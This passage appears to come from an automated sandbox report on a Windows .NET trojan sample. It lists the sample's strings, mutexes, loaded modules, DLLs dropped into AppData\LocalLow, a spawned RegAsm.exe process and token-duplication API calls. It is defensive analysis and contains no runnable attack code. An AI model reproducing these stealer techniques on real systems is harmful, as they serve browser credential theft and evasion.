Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: sqlite3.dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0
Source: softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary

.NET source code contains very large array initializations

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, KtGhbKBFWBVsWN4BBFA.cs

Large array initialization: KtGhbKBFWBVsWN4BBFA: array initializer size 82432

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Code function: 0_2_030410D8	0_2_030410D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404B50	3_2_00404B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409ADC	3_2_00409ADC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 760 -s 992

Source: sqlite3.dll.3.dr

Static PE information: Number of sections : 18 > 10

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.000000000141E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000000.1174572405.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBirding.exe4 vs SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Binary or memory string: OriginalFilenameBirding.exe4 vs SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/12@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040E38D CreateToolhelp32Snapshot,SetEnvironmentVariableA,GetLastError,OutputDebugStringA,Process32First,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CreateProcessWithTokenW,GetModuleFileNameW,CreateProcessWithTokenW,CloseHandle,Process32Next,

3_2_0040E38D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\LocalLow\nss3.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXs7yc2cpf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXdhtqvkw3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX39bzbsag
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXdjgl1lda
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXid6eg7kl
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX4z00y3dg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXdxglk35i
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXq1n7w3bt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX9of20kmn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXphqqzlgp
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXawf1ae1n
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXpzc2har6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXs0ri916b
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXuwyp0mzf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXa8cu8u0k
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXfk5pbuec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\stasvasbas
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX659bq5ml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXjac2h9rp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXukdk5rol
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXy9bs4nx7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX1foxa753
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX34s52bf3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXwtb7gfab
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTX7li8kyt9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXj7l6ka3u
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXqtzx8hp7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXeuk0bqyk
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\MTXrulvz4cj

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4826cb0c-86a7-49ef-b0d1-dd0eca4ae5e7

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 760 -s 992
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static file information: File size 5374505 > 1048576

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, WER1262.tmp.dmp.7.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.3.dr
Source:	Binary string: softokn3.pdbp source: softokn3.dll.3.dr
Source:	Binary string: $$.pdb)s source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Birding.pdbbp>- source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Birding.pdbD source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.000000000143C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Birding.pdbirding.pdbpdbing.pdbpdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Birding.pdbh source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.PDB source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL0vw# source: WER1262.tmp.dmp.7.dr
Source:	Binary string: @xo.pdbsw source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER1262.tmp.dmp.7.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.3.dr
Source:	Binary string: Birding.pdbS source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001484000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr
Source:	Binary string: \??\C:\Users\user\Desktop\Birding.pdb1 source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPlo0C:\Windows\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WER1262.tmp.dmp.7.dr
Source:	Binary string: mozglue.pdb@+ source: mozglue.dll.3.dr
Source:	Binary string: symbols\exe\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1262.tmp.dmp.7.dr
Source:	Binary string: nss3.pdb source: nss3.dll.3.dr
Source:	Binary string: C:\Windows\Birding.pdbpdbing.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Birding.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.3.dr
Source:	Binary string: \??\C:\Windows\Birding.pdbJp&- source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285674615.0000000001452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?xoC:\Users\user\Desktop\Birding.pdbsw source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, 00000000.00000002.1285616817.00000000012FA000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00401000 CreateWaitableTimerA,OutputDebugStringA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00401000

Source: sqlite3.dll.3.dr	Static PE information: real checksum: 0x119dc8 should be: 0x106c31
Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Static PE information: real checksum: 0x0 should be: 0x5217db

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.3.dr	Static PE information: section name: /4
Source: sqlite3.dll.3.dr	Static PE information: section name: /19
Source: sqlite3.dll.3.dr	Static PE information: section name: /31
Source: sqlite3.dll.3.dr	Static PE information: section name: /45
Source: sqlite3.dll.3.dr	Static PE information: section name: /57
Source: sqlite3.dll.3.dr	Static PE information: section name: /70
Source: sqlite3.dll.3.dr	Static PE information: section name: /81
Source: sqlite3.dll.3.dr	Static PE information: section name: /92
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg

Source: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Static PE information: section name: .text entropy: 7.031869268308508

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00401000

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
